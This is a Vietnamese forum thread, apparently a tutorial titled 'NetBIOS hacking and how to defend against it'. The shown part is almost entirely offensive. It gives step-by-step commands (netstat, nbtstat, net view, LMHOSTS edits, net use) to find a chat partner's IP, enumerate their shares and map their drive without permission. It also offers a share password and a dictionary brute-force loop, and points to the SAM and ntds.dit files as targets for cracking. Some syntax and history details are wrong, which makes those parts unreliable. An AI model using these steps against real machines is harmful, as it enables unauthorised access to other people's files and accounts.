Nếu bạn đang sử dụng ICQ để chát với victim bạn có thể sử dụng lệnh netstat -n (
lệnh này sẽ cho ta biết các kết nối đựơc thiết lập giữa máy của ta và bên ngoài và
qua các cổng nào ) để biết IP của victim.
Ví dụ: sau khi chạy lệnh netstat -n ta sẽ nhận đựơc bảng sau :
Active Connections
Proto Local Address Foreign Address State
TCP 192.168.0.1:3537 203.195.136.156:2869 Established



Bạn chú ý nhìn ở dưới dòng chữ Foreign Address số 203.195.136.156 <= Đó là địa
chỉ IP của victim, còn số 2869 chính là cổng kết nối.

Chữ Established => báo cho bạn biết một kết nối đã được thiết lập giữa máy tính
của bạn và victim.

Còn nếu bạn sử dụng MSN hay YH, nếu sử dụng lệnh netstat - n có thể bạn không
nhìn thấy IP của victim mà có thể là địa chỉ của Server của MSN hay YH.

Để xác định chính xác bạn có thể sử dụng Send File của YH để gửi một file tới
victim. Trước khi Send File, sử dụng lệnh netstat -n để xác định các kết nối đã có.

Trong khi đang Send file bạn lại sử dụng lệnh netstat -n sau đó tìm địa chỉ IP nào
mà mới được thiết lập => đó chình là dịa chỉ IP của Victim ( vì khi Send file nó se
thiết lập một kết nối trực tiếp giữa máy bạn và victim )

Sau khi đã có địa chỉ IP của victim bạn sử dụng lênh nbtstat -a ipAddress ( lệnh
này dùng để xác đinh một số thông tin trên máy victim )
Ví dụ : C:\> nbtstat - a 203.210.136.23
( <= Đây là địa chỉ mô phỏng thôi đấy nhé - đừng thử greenbiggrin.gif )

Bạn có thể nhận được các dòng như sau
NetBIOS remote Machine Name Table
Name Type Status
may1 <00> Unique Registered
netde<00> Group Registered
may1 <03> Unique Registered
may1 <20> Unique Registered

MAC address 00-32-04-14-23-E6



Ở đây bạn chú ý đến số <20> => Nếu thấy số này có nghĩa là máy victim đã bật
chế độ chia sẻ File và máy in ( File And Printer Sharing )
Tiếp theo ta sử dụng lệnh net view \\ipaddress ( lệnh này dùng để xem máy vic
tim chia sẻ những cái gì để còn )

Ví dụ : C:> net view \\203.210.136.23
Bạn có thể thấy các dòng tương tự như ở dưới đây :
Shared resource at \\203.210.136.23
Share name Type User As Comment
C Disk
D Disk
IPC$ Disk

The command complete succesfully


=D> Đến đây bạn vào tìm file LMHost - nếu không có thì tạo ra ( Nếu bạn sử dụng

window98 thì nó nằm ngay trong thư mục windows, nếu là XP thì trong thư mục
Windows\System32\Drivers \etc còn Win2000 thì nằm trong
WinNT\System32\Drivers\etc )

Lạm bàn về LMHost : Ngày trước tên máy và địa chỉ IP được lưu vào trong đó -
Nó được dùng để phân giải tên máy và địa chỉ IP ( Name - to - Address )

File này được cập nhật và quản lý bởi SRI - NIC ( Standford Research Institute
Network Information Center ), vài tuần một lần tổ chức này lại cập nhật lại nội
dung File này.

Ngày trước các Admin của mạng thường Download về Server của mình. Dần dần
số lượng của các trang Web trên Net ngày càng nhiều => cách sử dụng này trở nên
thiếu hiệu quả và mất thời gian => DNS ra đời
( Cũng có bài viết chi tiết về DNS trên HVA portal ).

Sau đó bạn thêm vào trong File này theo cú pháp sau :
ipAddressvictim tênmáy #PRE

Ví dụ ở đây tôi thêm vào dòng : 203.210.136.23 MAY1 #PRE trong File LMHost,
rồi chạy lệnh nbtstat -R để nạp lại table cache.

Bây giờ bạn có thể tạo thêm một ổ trên máy tính của mình và kết nối tới ở hay thư
mục được Share trên máy tính của victim bằng cách sử dụng lênh Net use

Net use Tên_ổ_đĩa : \\ipAddressVictim\shareName

Ví dụ : Net use X: \\203.210.136.23\C

Nếu thấy dòng lệnh

The command was complete succesfully



Done, bấm đúp vào My Computer và xem thử xem có gì mới trong máy tính của ta
không.

Để tránh nhầm lẫn khi ánh xạ ổ đĩa ta có thể sử dụng ký hiệu * thay cho tên ổ đĩa:

net use * \\203.210.136.23\C

Thế nhưng nhiều khi cuộc đời không đẹp như mơ vì khi thực hiện đường truyền
của bạn chậm hay vì máy victim đặt pass truy nhập.

Nếu máy victim sử dụng Windows95,98,98se hay Win me bạn có thể tạm dùng
pass : PQWAK ( cái này giống như kiểu concat trên các Main đời cũ

Thế thì còn máy tính dùng 2000 hay XP mà đặt pass và user thì làm thế nào =>
ta có thể xây dựng một từ điển để dò và sử dụng lệnh For của DOS để thực hiện.

Ví dụ tôi sẽ tạo ra một File có tên là DoPass.txt và có định dạng sau :
Code:
password username
password Administrator
"" Administrator
admin Administrator





Và bấy giờ ta có thể sử dụng lệnh For

C:\FOR /F "token=1,2* " %i in (DoPass.txt ) Do net use
\\IpAddressvictim\ShareName

( cú pháp sử dụng của lệnh FOR xin các bạn xem trong help của Windows )
<còn tiếp>
Tác giả: phuongdong
27/06/2006 02:57:34
Tiêu đề: Re: NetBIOS hacking và cách phòng chống (phuongdong)

light.phoenix
Ducks

Joined: 29/10/2004 15:16:29
Bài gởi: 31
Offline


Trước khi tiếp tục chúng ta cần tìm hiểu thêm một số thông tin về dòng
Window2000 ( 2000 Pro, 2000 family và 2000 Advandce server ) và Windows XP.
Mặc định sau khi cài đặt xong các hệ điều hành này thì tất cả các ổ đĩa của và một
số thư mục của chúng sẽ được thiết lập ở chế độ Share ẩn.

Thế Share ẩn là gì ? Bình thường nếu bạn đã làm việc trong môi trường mạng thì
việc chia sẻ các ổ đĩa hay thư mục bằng cách bấm phím phải chuột trên ổ đĩa hay
thư mục và chọn Sharing => Ổ đĩa hay thư mục đó sẽ xuất hiện trên mạng. Nhưng
nếu bây giờ ta thêm vào sau tên của ổ đĩa hay thư mục chia sẻ ký hiệu $ thì việc
chia sẻ vẫn xảy ra nhưng không hiện lên trên mạng và chỉ có người nào biết đường
dẫn chính xác mới có thể sử dụng đựơc các tài nguyên này.


Để xem được các thông tin về việc chia sẻ trên máy tính của mình bạn có thể vào
Start\Program\Administrator Tools\Computer management sau đó chọn vào
mục Shared Folders để kiểm tra lại máy của mình ( Nếu trong Program chưa có
mục Administrator Tools bạn bấm phím phải chuột trên nút Start chọn properties
sau đó chọn mục Display Administrator Tools ).

Ví dụ bạn có thể nhìn thấy các thông tin sau :
Sharename Resource Remark

ADMIN$ C:\WINNT Remote Admin
C$ C:\ Default Share for Internal Use
D$ D:\ Default Share for Internal Use
E$ E:\ Default Share for Internal Use
print$ C:\WINNT\SYSTEM\SPOOL
IPC$ Remote IPC


Nếu bạn đang dùng XP thì ADMIN$ sẽ là C:\WINDOWS( Thư mục mặc định khi
bạn cài XP ).

Bạn có thể cắt tất cả các chế độ Share của các ổ trên máy tính nhưng riêng IPC$ thì
không thể bỏ nó đi đựơc ( Trên 4rum đã có một bài nói về cách tất chế độ Share
của IPC$ bằng cách sử dụng một số lệnh viết trong File autoexec.bat - Bạn có thể
tìm lại bài đó để xem).

Thế còn thông tin về user và pass được lưu ở đâu, trên các hệ thống NT và
windows2000 và XP chạy ở nhà ( Stand - alone ) các thông tin này được lưu ở
trong File %systemroot%\system32\config\sam.


Với %systemroot % - chính là thư mục mà bạn cài đặt windows ( có thể là
windows, winNT etc ).

Và File đó gọi là File SAM - Security Accounts Manager. Các thông tin lưu
trong này được mã hoá theo cái gọi là one- way function ( OWF) hoặc giải thuật
Hash và kết quả là giá trị mà nó lưu giữ không thể đựơc giải mã (decrypted).

Trong Windows2000 Domain Controller các thông tin này đựơc lưu trong Active
Directory ( nếu khi cài đặt để ở chế độ mặc đinh thì nó nằmg trong
%systemroot%\ntds\ntds.dit - File này vào khoảng 10Mb => Việc Down về để giải
mã cũng như việc giả mã là không thể => thường nếu định dò pass của DC thì tốt
nhất là" chuyển " )

SID

Khi Windows2000 hay Windows2000 Domain được cài đặt nó sẽ sinh ra một số
ngẫu nhiên cho mỗi User - Đây là một số 48 Bit được gọi là Security Indentifier
(SID)